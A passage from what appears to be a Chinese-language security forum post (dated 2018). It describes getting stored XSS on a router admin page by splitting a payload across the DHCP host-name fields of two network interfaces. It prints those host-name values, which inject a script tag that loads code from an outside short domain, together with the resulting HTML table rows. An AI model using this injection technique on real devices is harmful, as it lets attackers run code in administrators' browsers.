我想我需要购买一个像l.ly这样的短域名,并将我的payload文件命名为1,这样我的问题就将得到解决,但这是不可能的我没那么多钱去购买那样一个域名。经过几个小时的思考,我终于想到了一个完美的解决方案,我唯一需要的就是另一个网络接口,在路由器上创建这个输出。 - <tr><td>10</td><td><script src=//l.ly/uXa><!--</td><td>f4:96:34:25:65:c5</td><td>192.168.0.44</td></tr>
- <tr><td>10</td><td>--></script></script</td><td>f4:96:34:25:65:c5</td><td>192.168.0.44</td></tr>
我分割了我的2个接口上的payload,第一个接口接收以下payload, - send host-name = "<script src=//l.ly/uXa><!--";
在payload的开始处,有一个HTML注释,会忽略script标签后的所有内容,第二个payload, - send host-name = "--></script>";
我刚刚关闭了注释,并插入script标签的末尾,我强制接口再次lease IP地址和请求,最终我的XSS payload终于被执行了。
| 
发表于 2018-4-18 15:38:09
